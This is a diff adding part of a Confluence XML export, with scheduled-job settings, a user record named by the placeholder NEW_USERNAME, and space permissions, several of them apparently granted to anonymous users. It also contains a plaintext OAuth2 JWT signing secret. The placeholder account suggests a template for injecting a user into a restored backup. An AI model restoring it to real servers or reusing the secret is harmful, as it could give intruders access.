+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.analytics.client.configuration..analytics_enabled]]></property>
+<property name="value"><![CDATA[<string>true</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32820</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.plugins.oauth2.provider.jwt.secret]]></property>
+<property name="value"><![CDATA[<string>385f48cdf4038b1577ad4191bff5fc8ae24efbb9aaf8fea882b4d535f0297a33</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32821</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.upm:notifications:notification-edition.mismatch]]></property>
+<property name="value"><![CDATA[<list/>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32850</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#FlushContentIndexScheduledJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32851</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#FlushChangeIndexScheduledJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32848</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#ExpiredUserVerificationTokenCleanupJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32849</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#VersionHardRemovalScheduledJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>false</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32846</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#DeferredFileDeletionJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32847</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#TrashSoftRemovalScheduledJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32844</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#JournalCleaner]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32845</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#clearOldMailErrorsJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32842</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#VersionSoftRemovalScheduledJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32843</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#AncestorsRepairJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32840</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#ClusterCacheCompactionJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32841</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#JmxLoggingJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32838</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#CleanTempDirectoryJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32839</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#PropertyEntryGardeningJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32836</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[confluence.darkfeature]]></property>
+<property name="value"><![CDATA[<string>site-wide.shared-drafts</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32837</id>
+<property name="context"><![CDATA[com.atlassian.confluence.content.render.xhtml.migration.macro.MacroMigrationService]]></property>
+<property name="key"><![CDATA[migration.required]]></property>
+<property name="value"><![CDATA[<boolean>false</boolean>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32886</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[c.a.c.plugins:confluence-user-rest:hadHadASingleDirectory]]></property>
+<property name="value"><![CDATA[<string>true</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32887</id>
+<property name="context"><![CDATA[com.atlassian.confluence.admin.tasks.AdminTaskData]]></property>
+<property name="key"><![CDATA[admintask.remigration.xhtml]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.admin.tasks.AdminTaskData>
+  <completedAt>2023-11-09 06:04:53.20 UTC</completedAt>
+</com.atlassian.confluence.admin.tasks.AdminTaskData>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32884</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#periodicEventPublisherJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32885</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[c.a.c.plugins:confluence-user-rest:firstCheckDateMs]]></property>
+<property name="value"><![CDATA[<string>1699509886924</string>]]></property>
+</object>
+<object class="ConfluenceUserImpl" package="com.atlassian.confluence.user">
+<id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+<property name="name"><![CDATA[NEW_USERNAME]]></property>
+<property name="lowerName"><![CDATA[NEW_USERNAME_LOWER]]></property>
+<property name="email"><![CDATA[admin@test.com]]></property>
+</object>
+<object class="User2ContentRelationEntity" package="com.atlassian.confluence.internal.relations.dao">
+<id name="id">229377</id>
+<property name="targetContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98322</id>
+</property>
+<property name="sourceContent" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="targetType" enum-class="RelatableEntityTypeEnum" package="com.atlassian.confluence.internal.relations">PAGE</property>
+<property name="relationName"><![CDATA[collaborator]]></property>
+<property name="creationDate">2020-10-21 01:32:57.499</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+</object>
+<object class="User2ContentRelationEntity" package="com.atlassian.confluence.internal.relations.dao">
+<id name="id">229378</id>
+<property name="targetContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98332</id>
+</property>
+<property name="sourceContent" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="targetType" enum-class="RelatableEntityTypeEnum" package="com.atlassian.confluence.internal.relations">PAGE</property>
+<property name="relationName"><![CDATA[collaborator]]></property>
+<property name="creationDate">2020-10-21 01:38:37.286</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458796</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[REMOVEMAIL]]></property>
+<property name="group"><![CDATA[confluence-users]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.405</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.405</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458797</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[REMOVEMAIL]]></property>
+<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.407</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.407</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458798</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[SETPAGEPERMISSIONS]]></property>
+<property name="group"><![CDATA[confluence-administrators]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.408</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.408</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458799</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[SETPAGEPERMISSIONS]]></property>
+<property name="group"><![CDATA[confluence-users]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.411</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.411</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458792</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[EXPORTSPACE]]></property>
+<property name="group"><![CDATA[confluence-administrators]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.397</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.397</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458793</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[EXPORTSPACE]]></property>
+<property name="group"><![CDATA[confluence-users]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.399</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.399</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458794</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[EXPORTSPACE]]></property>
+<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.401</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.401</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458795</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[REMOVEMAIL]]></property>
+<property name="group"><![CDATA[confluence-administrators]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.403</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.403</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458788</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[REMOVEATTACHMENT]]></property>
+<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.387</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.387</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458789</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[EDITBLOG]]></property>
+<property name="group"><![CDATA[confluence-administrators]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.389</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.389</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458790</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[EDITBLOG]]></property>
+<property name="group"><![CDATA[confluence-users]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.391</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.391</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458791</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[EDITBLOG]]></property>
+<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.394</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.394</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458784</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[CREATEATTACHMENT]]></property>
+<property name="group"><![CDATA[confluence-users]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.376</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.376</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458785</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[CREATEATTACHMENT]]></property>
+<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.379</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.379</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458786</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[REMOVEATTACHMENT]]></property>
+<property name="group"><![CDATA[confluence-administrators]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.381</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.381</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458787</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[REMOVEATTACHMENT]]></property>
+<property name="group"><![CDATA[confluence-users]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.384</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.384</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458780</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[REMOVEBLOG]]></property>
+<property name="group"><![CDATA[confluence-administrators]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.367</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.367</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458781</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[REMOVEBLOG]]></property>
+<property name="group"><![CDATA[confluence-users]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.369</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.369</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458782</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[REMOVEBLOG]]></property>
+<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.371</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.371</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458783</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[CREATEATTACHMENT]]></property>
+<property name="group"><![CDATA[confluence-administrators]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.374</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.374</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458776</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[REMOVEPAGE]]></property>
+<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.356</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.356</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458777</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[REMOVECOMMENT]]></property>
+<property name="group"><![CDATA[confluence-administrators]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.361</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.361</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458778</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[REMOVECOMMENT]]></property>
+<property name="group"><![CDATA[confluence-users]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.363</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.363</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458779</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[REMOVECOMMENT]]></property>
+<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.365</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.365</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458772</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[EDITSPACE]]></property>
+<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.346</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.346</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458773</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[SETSPACEPERMISSIONS]]></property>
+<property name="group"><![CDATA[confluence-administrators]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.349</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.349</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458774</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[REMOVEPAGE]]></property>
+<property name="group"><![CDATA[confluence-administrators]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.351</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.351</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458775</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[REMOVEPAGE]]></property>
+<property name="group"><![CDATA[confluence-users]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.353</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.353</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458768</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[COMMENT]]></property>
+<property name="group"><![CDATA[confluence-users]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.336</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.336</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458769</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[COMMENT]]></property>
+<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.339</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.339</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458770</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[EDITSPACE]]></property>
+<property name="group"><![CDATA[confluence-administrators]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.341</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.341</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458771</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[EDITSPACE]]></property>
+<property name="group"><![CDATA[confluence-users]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.344</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.344</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458764</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[REMOVEOWNCONTENT]]></property>
+<property name="group"><![CDATA[confluence-administrators]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.323</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.323</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458765</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[REMOVEOWNCONTENT]]></property>
+<property name="group"><![CDATA[confluence-users]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.326</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.326</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458766</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[REMOVEOWNCONTENT]]></property>
+<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.329</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.329</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458767</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[COMMENT]]></property>
+<property name="group"><![CDATA[confluence-administrators]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.332</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.332</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458760</id>
+<property name="type"><![CDATA[CREATESPACE]]></property>
+<property name="group"><![CDATA[confluence-administrators]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:18.418</property>
+<property name="lastModificationDate">2023-11-09 06:04:18.418</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458761</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[VIEWSPACE]]></property>
+<property name="group"><![CDATA[confluence-administrators]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.263</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.263</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458762</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[VIEWSPACE]]></property>
+<property name="group"><![CDATA[confluence-users]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.305</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.305</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458763</id>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="type"><![CDATA[VIEWSPACE]]></property>
+<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.315</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.315</property>
+</object>
+<object class="AliasedKey" package="com.atlassian.confluence.security.persistence.dao.hibernate">
